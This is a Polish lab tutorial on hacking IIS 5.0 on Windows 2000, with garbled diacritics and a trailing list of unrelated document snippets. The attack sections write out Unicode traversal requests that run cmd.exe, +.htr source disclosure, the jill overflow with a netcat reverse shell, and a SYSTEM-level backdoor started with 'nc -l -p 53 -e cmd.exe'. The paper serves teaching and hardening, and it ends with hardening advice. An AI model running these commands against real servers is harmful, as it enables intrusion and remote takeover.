IIS 5.0 błdy i luki w serwerze WWW

Wielkość: px
Rozpocząć pokaz od strony:

Download "IIS 5.0 błdy i luki w serwerze WWW"

Transkrypt

1 IIS 5.0 błdy i luki w serwerze WWW

2 W pracy omówione zostan sposoby jakimi moe posłuy si intruz zamierzajcy włama si do serwera IIS, by zmieni zawarto umieszczonych na nim stron lub całkowicie przej kontrol na systemem. Pokazane zostan take metody zabezpieczenia serwera przed atakiem. Pakiet oprogramowania Internet Information Services (IIS) jest dołczony do systemu operacyjnego Windows. Jego podstawowym zadaniem jest pełnienie funkcji serwera WWW, ponadto oferuje równie moliwo uruchomienia serwerów FTP, SMTP, NNTP oraz proxy. IIS jest popularnym serwerem midzy innymi ze wzgldu na prostot konfiguracji. Po zainstalowaniu składników serwera nie trzeba wiele wysiłku, eby uruchomi serwis WWW. Z punktu widzenia uytkowników niezajmujcych si systemami komputerowymi ani bezpieczestwem, jest to dua zaleta. Jest to jednak równie dua zaleta dla intruzów. Wikszo uytkowników poprzestaje na podstawowej instalacji IIS, nie starajc si dodatkowo zabezpieczy serwera. Zwykle wic serwer IIS działa z domyln konfiguracj, co sprawia e jest on czstym celem ataków. W eksperymentach korzysta bd z dwóch wirtualnych maszyn. Na jednej z nich zainstalowany jest system operacyjny Windows 2000 Professional oraz pakiet IIS 5.0 z domylnymi ustawieniami (IP: ) komputer bdcy ofiar ataków. Druga maszyna działa pod systemem Mandrake Linux 10.1 (IP: ) komputer intruza. JAK ROZPOZNA SERWER IIS Aby rozpocz atak na serwer IIS intruz musi si najpierw upewni, e jego celem jest rzeczywicie serwer IIS. Jednym ze sposobów w jaki moe to zrobi jest tzw. badanie banerów. Proces pobierania strony z serwera polega na wysyłaniu da (od klienta do serwera) i otrzymaniu odpowiedzi (od serwera do klienta). W skład odpowiedzi serwera wchodzi zawarto strony oraz nagłówki HTTP. Domylnie skonfigurowany serwer IIS bez wahania ujawnia swoj tosamo, wysyłajc nastpujcy nagłówek: Server: Microsoft-IIS/5.0

3 Technik t mona zastosowa poprzez połczenie si z portem 80 serwera i wysłanie odpowiedniego cigu znaków jako danie, a nastpnie odczytanie nagłówków otrzymanej odpowiedzi. Do nawizania połczenia TCP z okrelonym portem danego serwera mona posłuy si narzdziem netcat. [ Po zainicjowaniu połczenia poleceniem nc wpisujemy danie: GET / HTTP/1.0, a nastpnie pusty wiersz. W odpowiedzi od serwera widzimy zapis: Server: Microsoft-IIS/5.0. Oznacza to, e na komputerze jest uruchomiony IIS w wersji 5.0. Przykład zastosowania tej metody został pokazany na rysunku poniej. Chcc zabezpieczy serwer przed identyfikacj poprzez badanie banera, powinnimy zmieni tre odpowiedzi banera. Nie jest to proste, poniewa w serwerze IIS 5.0 tre banera jest na stałe zapisana w kodzie programu. Mona jednak skorzysta z narzdzia UrlScan. W pliku konfiguracyjnym urlscan.ini zmieniamy wpis RemoveServerHeader=0 na RemoveServerHeader=1 Po wprowadzeniu tej zmiany z nagłówków odpowiedzi znika informacja o typie serwera. Wicej o UrlScan na stronie: [

4 Po sprawdzeniu, e mamy do czynienia z serwerem IIS, rozpoczynamy testowanie, na jakie metody ataku jest on podatny. PRZEGLDANIE SYSTEMU PLIKÓW Ataki zwane przegldanie systemu plików (ang. filesystem traversal) umoliwiaj odczytywanie plików znajdujcych si na serwerze, a niekiedy nawet zdalne wykonywanie polece. Idea jest prosta korzystajc z tradycyjnej sztuczki../ moemy uzyska dostp do dowolnego pliku na serwerze, a nawet wykonywa polecenia (uruchamiajc cmd.exe). Symbol../ uywany jest w URL-u w podobny sposób jak podczas zmiany biecego katalogu w wierszu polece. Przykład: Jeli jestemy w katalogu c:\temp\katalog, to po wywołaniu polecenia cd.. znajdziemy si stopie wyej, czyli w katalogu c:\temp. W przypadku URL sytuacja wyglda analogicznie. Umieszczajc../ w daniu wysłanym do serwera, intruz bdzie mógł porusza si po drzewie katalogów serwera. Gdybymy wysłali nastpujce danie: w odpowiedzi otrzymalibymy plik \dokumenty\2004\info.html z głównego katalogu serwera WWW. Jeli głównym katalogiem jest c:\inetpub, otrzymalibymy plik c:\inetpub\dokumenty\2004\info.html. Jeli natomiast wysłalibymy danie: otrzymalibymy plik c:\inetpub\dokumenty\2003\info.html. Umieszczajc symbol dwóch kropek spowodowalimy zmian katalogu z 2004 na katalog nadrzdny dokumenty, nastpnie dostalimy si do katalogu 2003, skd zadalimy pliku info.html. W obu przypadkach nie przekroczylimy naszych praw. Odczytalimy plik znajdujcy si w c:\inetpub. Co jednak stałoby si gdybymy chcieli odczyta plik: W tej sytuacji dwie kropki przenosz z katalogu c:\inetpub do katalogu nadrzdnego c:\, w którym znajduje si plik plik.txt. Jeli faktycznie udałoby si nam odczyta ten plik,

5 oznaczałoby to, e uzyskalimy dostp do informacji nie udostpnionych dla uytkowników serwera WWW. Ponadto, gdybymy tylko znali struktur katalogów serwera, moglibymy dosta si do kadego pliku. Przyjrzyjmy si kilku przykładom. Przegldanie systemu plików za pomoc Unicode Zasadniczo IIS 5.0 nie jest podatny na sztuczki z wykorzystaniem symbolu../ - przed wysłaniem pliku klientowi serwer sprawdza, czy w ciece dostpu nie wystpuje cig../ mogcy spowodowa wyjcie z głównego katalogu. Interesujca sytuacja ma miejsce, gdy w ciece wystpuj znaki Unicode. W takim przypadku IIS najwyraniej sprawdza ciek przed dekodowaniem tych znaków. Oznacza to, e po odebraniu dania: IIS w pierwszej kolejnoci sprawdza, czy danie nie zawiera podejrzanego symbolu../. Nastpnie dekoduje znaki Unicode. Cig %c0%af odpowiada znakowi / w Unicode, tak wic danie przetwarzane jest do nastpujcej postaci: co oznacza, e IIS dostarczy nam plik c:\plik.txt. Wykorzystujc t luk jestemy w stanie uzyska dostp do dowolnego pliku na serwerze, pod warunkiem, e znamy ciek dostpu do niego. Dostp uzyskamy z uprawnieniami konta IUSR_NAZWAKOMPUTERA, gdzie NAZWAKOMPUTERA jest netbiosow nazw serwera. To konto jest wykorzystywane do anonimowego dostpu z sieci do serwera WWW. Standardowo naley ono do grupy Gocie (Local Guests) na serwerze. Uprawnienia tego konta przyznawane s anonimowym uytkownikom serwera WWW. Poza kontem IUSR_NAZWAKOMPUTERA, mamy jeszcze konto SYSTEM (LocalSystem). Jest ono wykorzystywane przez system operacyjny do uruchamiania programów i sterowników. Nie jest kontem uytkownika. Konto to ma nieograniczony dostp do systemu operacyjnego. Jeli intruzowi udałoby si przej kontrol nad tym kontem, mógłby zrobi z systemem praktycznie wszystko. Załómy e znamy lokalizacj pliku, do którego chcemy uzyska dostp. Aby wysła danie moemy skorzysta z przegldarki lub wysła danie HTTP bezporednio, za pomoc programu netcat. W pierwszym przypadku wpisujemy je w polu adresu przegldarki, w drugim natomiast postpujemy podobnie jak przy badaniu banerów, tj. wpisujc:

6 nc GET /..%c0%afplik.txt Jeli plik, którego dotyczy danie, jest plikiem wykonywalnym, uzyskujemy dodatkowe moliwoci. Jeli znajduj si on w katalogu wirtualnym, w którym uytkownik IUSR_NAZWAKOMUTERA ma prawo wykonywania (na przykład /scripts), wówczas zostanie wykonany, a wynik zostanie zwrócony przez serwer. Moemy ponadto oszuka serwer, by uznał, e plik znajduje si w katalogu z prawem wykonywania nawet, jeli faktycznie jest inaczej. Wykorzystujc ponownie sztuczk z dwiema kropkami wchodzimy do katalogu /scripts, po czym wychodzimy do katalogu nadrzdnego i podajemy ciek dostpu do pliku w innym katalogu. Przykład: Serwer IIS bdzie sdził, e plik znajduje si w katalogu scripts cieka jest analizowana zanim cig..%c0%af.. zostanie zdekodowany do postaci../... Serwer nie wie zatem, e po wejciu do katalogu scripts przechodzimy dwa poziomy wyej i próbujemy uzyska dostp do /winnt/system32/cmd.exe. Warto wiedzie, e do wywoływanego pliku moemy przekazywa argumenty, posługujc si znakiem?. Przykład: Chcc wypisa zawarto katalogu c:\ wysyłamy nastpujce danie: dir+c:\ danie moemy wysła za pomoc przegldarki lub programu netcat

7 Luka przegldania systemu plików została poprawiona w Windows 2000 Service Pack 3. ATAKI PRZEZ PRZEPEŁNIENIE BUFORA Atak przez przepełnienie bufora, w skrócie, polega na przekazaniu programowi zbyt duej iloci danych, powodujc wykonanie przygotowanego przez intruza kodu, który w normalnych okolicznociach nie miałby prawa zosta wykonany. Dodatkowy kod trafia do innego obszaru pamici i wskutek błdu w programie, który niewłaciwie sprawdza rozmiar danych wejciowych, zostaje wykonany z uprawnieniami takimi samymi, jak wadliwy program. Poniewa IIS działa na koncie SYSTEM, które w Windows ma nieograniczon władz, przepełnienie bufora naley uwaa za najbardziej niebezpieczny rodzaj ataku, na jaki naraony jest serwer IIS. Przepełnienie bufora IPP Luka ta wystpuje w filtrze ISAPI.printer, którego zadaniem jest obsługa protokołu Internet Printing Protocol (IPP). Sama technologia ISAPI (Internet Services Application Programming Interface) umoliwia rozszerzanie funkcjonalnoci serwera WWW poprzez dołczanie do niego kodu implementujcego dodatkowe usługi.

8 Filtr ISAPI.printer jest domylnie instalowany na serwerze. Błd mona wykorzysta wysyłajc cig około 420 bajtów w nagłówku wysłanym w daniu ISAPI.printer. Po otrzymaniu takiego dania w IIS dochodzi do przepełnienia bufora i serwer przestaje działa. Jednak Windows 2000 automatycznie uruchamia IIS ponownie zaraz po awarii, co ma na celu zapewnienie jak najwikszej niezawodnoci usług sieciowych. W efekcie kod umieszczony w buforze zostaje wykonany. Luk wykorzystuje exploit zwany jill [ którego autorem jest dark spirit z beavuh.org. Exploit powoduje przepełnienie bufora w serwerze IIS i uruchamia na zdalnej maszynie powłok, do której dostp moe uzyska intruz łczc si z portem o wybranym numerze. Intruz rozpoczyna od nasłuchiwania na wybranym porcie TCP (np. 2006), za pomoc takiego narzdzia jak netcat: nc vv l p 2006 W drugim oknie polece intruz uruchamia exploita, podajc mu jako parametry: IP ofiary, IP maszyny nasłuchujcej oraz numer portu, na którym ma zosta udostpniona powłoka. Intruz jeszcze tylko musi wcisn [Enter] w okienku nasłuchiwania by połczy si z powłok. Nastpnie moe wywoływa dowolne polecenia z uprawnieniami konta SYSTEM.

9 Błd został naprawiony w Windows 2000 SP3. UJAWNIANIE KODU RÓDŁOWEGO Gdy klient wysyła do serwera danie otworzenia strony HTML, serwer bezporednio odsyła mu jej zawarto. Kiedy danie dotyczy strony zrealizowanej w ASP lub PHP, wówczas w pierwszej kolejnoci serwer wykonuje kod zawarty w skrypcie, a potem wysyła wyniki klientowi. W ten sposób klient nie ma dostpu do kodu ródłowego strony (skryptu), któr oglda. Ten fakt jest niekiedy wykorzystywany przez programistów, którzy umieszczaj w kodzie stron poufne informacje, jak choby nazwy uytkowników i hasła. Przykładowo, logowanie uytkownika moe wyglda nastpujco: if ( $username== admin ) && ($passwd== secret77 ) ) { $logged_in=1; }

10 W normalnych okolicznociach takie rozwizanie nie jest niebezpieczne, poniewa uytkownik nie moe zobaczy treci kodu ródłowego. Jeli jednak znalazłby luk w serwerze IIS umoliwiajc podgld kodu stron, wówczas hasło zostałoby ujawnione. Luka +.htr HTR jest jedn z pierwszych zaawansowanych technik skryptowych, jakie weszły w skład serwera IIS 2.0. Obecnie najczciej spotykanym zastosowaniem mechanizmu HTR jest zestaw skryptów dołczonych standardowo do serwera IIS. Ich zadaniem jest umoliwienie dostpu do haseł Windows NT przez serwer WWW. Uytkownicy mog za pomoc tych skryptów zmienia swoje hasła, natomiast administratorzy mog wykorzystywa je w zarzdzaniu hasłami. Gdy klient wysyła danie pliku.htr jest ono przekazywane do biblioteki ISM.DLL, która wskutek błdu zwraca zawarto pliku. W ten sposób intruz moe odczyta tre pliku.htr. Ten sam błd moe by wykorzystany do odczytania zawartoci pliku.asp. Wybieramy ciek dostpu do dowolnego pliku.asp: i dodajemy do niej +.htr: Gdy serwer IIS analizuje otrzymane danie, zwraca uwag na kocowy cig znaków.htr, wic postpuje tak samo jak w przypadku dowolnego pliku.htr przekazuje danie do biblioteki ISM.DLL. ISM.DLL usuwa ze cieki przyrostek +.htr i pokazuje zawarto pliku /global.asa. W podobny sposób mona postpi z plikami.asp i.ini. Jednak odczytana zostanie tre ródła pliku tylko do pierwszego wystpienia cigu <% - znaczniki <% i %> s ogranicznikami skryptów wykonywanych po stronie serwera. Chcc odczyta plik global.asa, intruz musi jedynie uruchomi program netcat i wpisa danie GET /global.asa+.htr. Oczywicie moe równie skorzysta z przegldarki i wpisa nastpujcy adres:

11 Dostp do poufnych informacji (na przykład nazwy uytkownika i hasła) moe znaczco ułatwi intruzowi włamanie do systemu. Najskuteczniejsz ochron przed ujawnieniem ukrytych informacji jest przestrzeganie zasad bezpiecznego programowania w kodzie ASP. Luka została naprawiona w Windows 2000 SP3. ZWIKSZANIE UPRAWNIE Intruz, który zdołał wedrze si do systemu i uruchomi powłok z uprawnieniami konta SYSTEM ma prawie nieograniczone moliwoci. Jednak nawet, gdy intruz dysponuje jedynie uprawnieniami konta anonimowego lub nieuprzywilejowanego, moe dokona zniszcze w systemie lub nawet przej uprawnienia konta SYSTEM. Jak kopiowa pliki na system ofiary Gdy jestemy zalogowani lokalnie do komputera z systemem Windows, moemy łatwo przekierowywa wyniki wykonywanego polecenia stosujc symbol >. Przykładowo, jeli wydamy nastpujce polecenie: dir c:\ > dirc.txt wyniki polecenia trafi do pliku dirc.txt. Metody tej nie mona jednak stosowa w przypadku polece wykonywanych za porednictwem cmd.exe ze wzgldu na ograniczenia przekierowa w serwerze IIS, chyba, e zmienimy nazw cmd.exe. Dlatego te pierwsz rzecz, jak robi intruz, jest skopiowanie

12 pliku cmd.exe do katalogu /scripts (podstawowe ustawienia bezpieczestwa Windows 2000 daj uytkownikowi nalecemu do grupy Wszyscy (Everyone) pełn kontrol nad tym katalogiem). Intruz wpisuje w przegldarce nastpujcy adres: +copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmdx.exe Kopia cmd.exe została umieszczona w katalogu /scripts, zatem intruz nie bdzie musiał wykonywa adnych sztuczek z przechodzeniem do innego katalogu, by uzyska do niej dostp. Łatwiej bdzie mu wydawa polecenia w systemie ofiary.

13 Jak tworzy pliki w systemie ofiary Wydajc polecenie w rodzaju echo > plik, intruz ma moliwo tworzenia nowych plików w zdalnym systemie za pomoc przegldarki, w której wpisuje adres: owy.txt Spowoduje to utworzenie pliku nowy.txt w katalogu /scripts. ATAK NA SERWER IIS ANALIZA KROK PO KROKU Przeanalizujmy teraz szczegółowy opis ataku na serwer IIS. Zobaczymy, jak serwer IIS ze standardowymi zabezpieczeniami, bez jakichkolwiek uaktualnie czy łat, pada ofiar intruza, który w piciu krokach zdobywa w systemie uprawnienia konta SYSTEM. Krok 1 poszukiwanie luk Najpierw intruz sprawdza, czy system jest podatny na atak Unicode.

14 katalogu c:\. Wyglda na to, e system jest podatny, poniewa udało si odczyta list plików w Krok 2 przygotowanie do umieszczenia plików na serwerze Chcc kontynuowa atak, intruz musi umieci na serwerze kilka plików. Mona tu skorzysta ze skryptu perla unicodeloader [ narzdzia, które umoliwia przesyłanie plików za porednictwem wygodnego interfejsu. Skrypt unicodeloader umieszcza na serwerze plik pomocniczy, który intruz otwiera (wpisujc okrelony adres), otrzymujc stron z formularzem słucym do przesyłania plików z komputera lokalnego na serwer. Wywoływany jest nastpujco: unicodeloader IP:port katalogwww Jako katalogwww podajemy nazw katalogu, w którym uytkownik IUSR_NAZWAKOMPUTERA moe wykonywa pliki. Jak zdylimy si przekona, warunek ten spełnia katalog c:\inetpub\scripts.

15 Intruz moe od tej pory przesyła pliki na serwer korzystajc ze strony upload.asp. Krok 3 umieszczenie plików na serwerze Po wpisaniu w przegldarce adresu intruz bdzie mógł za pomoc kilku klikni umieszcza pliki w katalogu wirtualnym /scripts. W kolejnym kroku intruz umieszcza na serwerze pliki niezbdne do przeprowadzenia dalszej czci ataku. Bdzie mu potrzebny plik, który umoliwi przejcie uprawnie konta

16 SYSTEM. W tym celu wykorzystana zostanie luka znana jako RevertToSelf w bibliotece DLL ISAPI. Luka wystpuje w mechanizmie InProcessIsapiApps, umoliwiajcym omijanie zabezpiecze aplikacji przy uyciu wywoła RevertToSelf w DLL ISAPI. W uproszczeniu, wywołanie RevertToSelf spowoduje, e biecy wtek zmieni swój kontekst bezpieczestwa z uprawnie IUSR_NAZWAKOMPUTERA na uprawnienia konta, z którego prawami działa IIS (inetinfo.exe) czyli SYSTEM. HD Moore z digitaloffence.net udostpnia plik iiscrack.dll [ który wykorzystuje omówion luk i umoliwia wykonywanie dowolnych polece z uprawnieniami konta SYSTEM. By zastosowa exploit naley zmieni nazw tego pliku na nazw okrelon w kluczu Metabazy IIS/LM/W3SVC/InProcessIsapiApps. Intruz musi zatem jedynie otworzy stron upload.asp i umieci na serwerze plik o nazwie zmienionej na httpodbc.dll. Wspomniany błd został naprawiony w Windows 2000 SP3. Nastpnym punktem planu intruza jest przygotowanie tylnej furtki w systemie ofiary. Intruz moe zastosowa program netcat (wersja dla Windows) [ który moe umieci na serwerze korzystajc ze strony upload.asp. Krok 4 uruchomienie tylnej furtki z uprawnieniami konta SYSTEM Aby wywoła httpodbc.dll w katalogu wirtualnym /scripts, intruz po prostu wpisuje w przegldarce adres: Uzyskuje w ten sposób dostp do strony, na której znajduje si pole tekstowe umoliwiajce wydawanie polece. Wpisane polecenie zostanie wykonane z uprawnieniami konta SYSTEM. Podczas testowania, okazało si, e nie do koca działa to poprawnie. Przy wydaniu polecenia: c:\winnt\system32\cmd.exe /c

17 pojawiał si nastpujcy błd Wystarczyło jednak w adresie cmd=c%3a%5cwinnt%5csystem32%5ccmd.exe+%2fc&submitter=execute skasowa ostatni człon:

18 &submitter=execute co sprawiło, e exploit zadziałał. Intruz wydaje wic nastpujce polecenie: c:\inetpub\scripts\nc l p 53 e cmd.exe I tak jak wczeniej kasuje ostatni człon w adresie, tj.

19 &submitter=execute W efekcie zobaczy on stron z potwierdzeniem poprawnego wykonania polecenia. Uruchamia ono powłok dostpn przez port TCP o numerze 53. Wybór numeru portu ma znacznie, poniewa gdyby atakowany serwer znajdował si za firewallem, istnieje spora szansa na to, e bdzie on akceptował połczenia AXFR DNS (port TCP 53). Krok 5 ostateczny cios Intruzowi pozostaje jedynie połczy si z powłok, któr uruchomił. Moe w tym celu wykorzysta program netcat.

20 JAK POPRAWI BEZPIECZESTWO Oto kilka metod postpowania słucych poprawie poziomu bezpieczestwa serwera IIS, których stosowanie znacznie ograniczy ryzyko włamania. 1. Na wstpie kilka wanych wskazówek odnonie instalacji: o przygotujmy oddzieln partycj lub oddzielny dysk dla zawartoci stron WWW udaremni to wikszo z omówionych ataków. Narzdzia słuce do włamywania si na serwery IIS zakładaj zwykle, e strony WWW s przechowywane w standardowych katalogach. o partycja systemowa oraz partycja zawierajca strony WWW powinny by partycjami NTFS. Pozwala to w wikszym stopniu kontrolowa ustawienia bezpieczestwa, korzystajc z list kontroli dostpu (ang. Access Control List - ACL). o instalujmy najnowsze pakiety uaktualnie i łaty. 2. Usumy z serwera przykładowe aplikacje i katalogi. Przykłady nie s do niczego potrzebne na pracujcym serwerze. Postpujmy według zasady: jeli co nie jest nam potrzebne, usumy to.

21 3. Wyłczmy wszystkie zbdne usługi, szczególnie serwer telnetu, jeli z niego nie korzystamy. 4. Powinnimy ponadto rozway podział plików udostpnianych na stronach pomidzy odrbne katalogi. 5. IIS jest wstpnie skonfigurowany tak, by obsługiwa podstawowe typy plików, takie jak.asp i.shtm. Gdy serwer odbiera danie dotyczce jednego z takich plików, jest ono obsługiwane przez bibliotek DLL. Jeli obsługa niektórych plików nie jest nam potrzebna, usumy ich mapowania, postpujc zgodnie z ponisz instrukcj: o otwieramy Menadera usług internetowych (Internet services manager), o klikamy prawym przyciskiem na nazw serwera, wybieramy z menu Właciwoci (Properties), o właciwoci główne (Master Properties), o wybieramy Usługa WWW->Edytuj->Katalog macierzysty->konfiguracja (WWW Service->Edit->HomeDirectory->Configuration). Bibliografia: - Magazyn Hakin9 nr 4/ Wykrywanie, analiza i przeciwdziałanie atakom hackerów w Checz Point Firewall-1 NG [ - strony www wymienione w pracy

Poradnik korzystania z serwisu UNET: Dostp do poczty elektronicznej ze strony WWW

Poradnik korzystania z serwisu UNET: Dostp do poczty elektronicznej ze strony WWW Poradnik korzystania z serwisu UNET: Dostp do poczty elektronicznej ze strony WWW W przypadku braku stosownego oprogramowania słucego do komunikacji z systemem pocztowym UNET uytkownik ma moliwo skorzystania

Bardziej szczegółowo

Projektowanie bezpiecze stwa sieci

Projektowanie bezpiecze stwa sieci Laboratorium 5. Projektowanie bezpieczestwa sieci Temat: Instalacja i konfiguracja serwera VPN. 1. Przed instalacj odpowiednich ról serwera, na maszynie wirtualnej serwera musimy przygotowa dwie karty

Bardziej szczegółowo

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows.

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows. Bezpieczeństwo Systemów Informatycznych Firewall (Zapora systemu) Firewall (zapora systemu) jest ważnym elementem bezpieczeństwa współczesnych systemów komputerowych. Jego główną rolą jest kontrola ruchu

Bardziej szczegółowo

Mozilla Firefox 2.0.0.2 PL. Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Firefox 2.0.0.2 PL. wersja 1.1

Mozilla Firefox 2.0.0.2 PL. Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Firefox 2.0.0.2 PL. wersja 1.1 Mozilla Firefox 2.0.0.2 PL Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Firefox 2.0.0.2 PL wersja 1.1 Spis treci 1. INSTALACJA CERTYFIKATÓW URZDÓW POREDNICH... 3 2. INSTALACJA

Bardziej szczegółowo

Poradnik korzystania z serwisu UNET: Konfiguracja programu pocztowego

Poradnik korzystania z serwisu UNET: Konfiguracja programu pocztowego Poradnik korzystania z serwisu UNET: Konfiguracja programu pocztowego Niniejszy opis dotyczy konfiguracji programu pocztowego Outlook Express z pakietu Internet Explorer, pracujcego pod kontrol systemu

Bardziej szczegółowo

Klonowanie MAC adresu oraz TTL

Klonowanie MAC adresu oraz TTL 1. Co to jest MAC adres? Klonowanie MAC adresu oraz TTL Adres MAC (Media Access Control) to unikalny adres (numer seryjny) kadego urzdzenia sieciowego (jak np. karta sieciowa). Kady MAC adres ma długo

Bardziej szczegółowo

Spis treci. Dzie 1. I Wprowadzenie (wersja 0911) II Dostp do danych biecych specyfikacja OPC Data Access (wersja 0911)

Spis treci. Dzie 1. I Wprowadzenie (wersja 0911) II Dostp do danych biecych specyfikacja OPC Data Access (wersja 0911) I Wprowadzenie (wersja 0911) Kurs OPC Integracja i Diagnostyka Spis treci Dzie 1 I-3 O czym bdziemy mówi? I-4 Typowe sytuacje I-5 Klasyczne podejcie do komunikacji z urzdzeniami automatyki I-6 Cechy podejcia

Bardziej szczegółowo

zdefiniowanie kilku grup dyskusyjnych, z których chcemy odbiera informacje, dodawanie, usuwanie lub edycj wczeniej zdefiniowanych grup dyskusyjnych,

zdefiniowanie kilku grup dyskusyjnych, z których chcemy odbiera informacje, dodawanie, usuwanie lub edycj wczeniej zdefiniowanych grup dyskusyjnych, Wstp W nowoczesnym wiecie coraz istotniejsz rol odgrywa informacja i łatwy dostp do niej. Nie dziwi wic fakt, i nowoczesne telefony komórkowe to nie tylko urzdzenia do prowadzenia rozmów telefonicznych,

Bardziej szczegółowo

Przegldanie stron wymaga odpowiedniej mikroprzegldarki w urzdzeniu mobilnym lub stosownego emulatora.

Przegldanie stron wymaga odpowiedniej mikroprzegldarki w urzdzeniu mobilnym lub stosownego emulatora. I. Temat wiczenia Podstawy tworzenia stron WAP II. Wymagania Podstawowe wiadomoci z technologii Internetowych. III. wiczenie 1. Wprowadzenie WAP (ang. Wireless Application Protocol) - to protokół umoliwiajcy

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików

Bardziej szczegółowo

obsług dowolnego typu formularzy (np. formularzy ankietowych), pobieranie wzorców formularzy z serwera centralnego,

obsług dowolnego typu formularzy (np. formularzy ankietowych), pobieranie wzorców formularzy z serwera centralnego, Wstp GeForms to program przeznaczony na telefony komórkowe (tzw. midlet) z obsług Javy (J2ME) umoliwiajcy wprowadzanie danych według rónorodnych wzorców. Wzory formularzy s pobierane z serwera centralnego

Bardziej szczegółowo

Opera 9.10. Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Opera 9.10. wersja 1.1 UNIZETO TECHNOLOGIES SA

Opera 9.10. Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Opera 9.10. wersja 1.1 UNIZETO TECHNOLOGIES SA Opera 9.10 Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Opera 9.10 wersja 1.1 Spis treci 1. INSTALACJA WŁASNEGO CERTYFIKATU Z PLIKU *.PFX... 3 2. WYKONYWANIE KOPII BEZPIECZESTWA WŁASNEGO

Bardziej szczegółowo

Tomasz Greszata - Koszalin

Tomasz Greszata - Koszalin T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołów HTTP oraz HTTPS i oprogramowania IIS (ang. Internet Information Services).

Bardziej szczegółowo

Systemy operacyjne lab. 6 Paweł Gmys strona 1

Systemy operacyjne lab. 6 Paweł Gmys strona 1 Systemy operacyjne lab. 6 Paweł Gmys strona 1 I Uytkownicy i grupy 1. Proces logowania Rozpoczynajc prac z systemem na komputerze lokalnym Windows 2000 musimy poda w oknie logowania identyfikator uytkownika

Bardziej szczegółowo

Instrukcja instalacji Control Expert 3.0

Instrukcja instalacji Control Expert 3.0 Instrukcja instalacji Control Expert 3.0 Program Control Expert 3.0 jest to program służący do zarządzania urządzeniami kontroli dostępu. Dedykowany jest dla kontrolerów GRx02 i GRx06 oraz rozwiązaniom

Bardziej szczegółowo

Dokonaj instalacji IIS opublikuj stronę internetową z pierwszych zajęć. Ukaże się kreator konfigurowania serwera i klikamy przycisk Dalej-->.

Dokonaj instalacji IIS opublikuj stronę internetową z pierwszych zajęć. Ukaże się kreator konfigurowania serwera i klikamy przycisk Dalej-->. Dokonaj instalacji IIS opublikuj stronę internetową z pierwszych zajęć Ukaże się kreator konfigurowania serwera i klikamy przycisk Dalej-->. Następnie wybieramy Serwer aplikacji (IIS, ASP.NET) i klikamy

Bardziej szczegółowo

Instalacja programu Sprzeda z motorem. bazy danych Pervasive V8

Instalacja programu Sprzeda z motorem. bazy danych Pervasive V8 Instalacja programu Sprzeda z motorem bazy danych Pervasive V8 1. Z katalogu instalacyjnego programu Pervasive uruchom plik setup.exe. Program instalacyjny w spakowanej wersji jest dostpny na naszym FTP

Bardziej szczegółowo

3. Instalator rozpocznie proces instalacji

3. Instalator rozpocznie proces instalacji Uwaga! Podana instrukcja instalacji została przygotowana w oparciu o pliki instalacyjne SQL 2005 Express pobrany ze strony Microsoftu oraz oddzielny plik Service Pack 2 dedykowany pod SQL Express równie

Bardziej szczegółowo

Mozilla Thunderbird 1.5.0.10 PL

Mozilla Thunderbird 1.5.0.10 PL Mozilla Thunderbird 1.5.0.10 PL Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Thunderbird 1.5.0.10 PL wersja 1.2 Spis treci 1. INSTALACJA CERTYFIKATÓW URZDÓW POREDNICH... 3 2.

Bardziej szczegółowo

Instrukcja instalacji HP Instant Support Enterprise Edition Standard Configuration (ISEE SC) MS Windows (HP Proliant, HP Netserver)

Instrukcja instalacji HP Instant Support Enterprise Edition Standard Configuration (ISEE SC) MS Windows (HP Proliant, HP Netserver) Instrukcja instalacji HP Instant Support Enterprise Edition Standard Configuration (ISEE SC) MS Windows (HP Proliant, HP Netserver) Copyright 2004 Hewlett-Packard Company Wersja 1.6 Wstp Instant Support

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS

Bardziej szczegółowo

Instalacja programu Sprzeda

Instalacja programu Sprzeda Instalacja programu Sprzeda 1. Aby zainstalowa program Sprzeda w wersji 2.10, na serwerze lub komputerze, na którym przechowywane bd dane programu, pozamykaj wszystkie działajce programy i uruchom plik

Bardziej szczegółowo

Instrukcja obsługi dodatku InsERT GT Smart Documents

Instrukcja obsługi dodatku InsERT GT Smart Documents Instrukcja obsługi dodatku InsERT GT Smart Documents InsERT, grudzie 2003 http://www.insert.com.pl/office2003 InsERT GT Smart Documents to przygotowany przez firm InsERT specjalny dodatek, umoliwiajcy

Bardziej szczegółowo

System midzybankowej informacji gospodarczej Dokumenty Zastrzeone MIG DZ ver. 2.0. Aplikacja WWW ver. 2.1 Instrukcja Obsługi

System midzybankowej informacji gospodarczej Dokumenty Zastrzeone MIG DZ ver. 2.0. Aplikacja WWW ver. 2.1 Instrukcja Obsługi System midzybankowej informacji gospodarczej Dokumenty Zastrzeone MIG DZ ver. 2.0. Aplikacja WWW ver. 2.1 Instrukcja Obsługi 1.Wymagania techniczne 1.1. Wymagania sprztowe - minimalne : komputer PC Intel

Bardziej szczegółowo

1. Informacje ogólne.

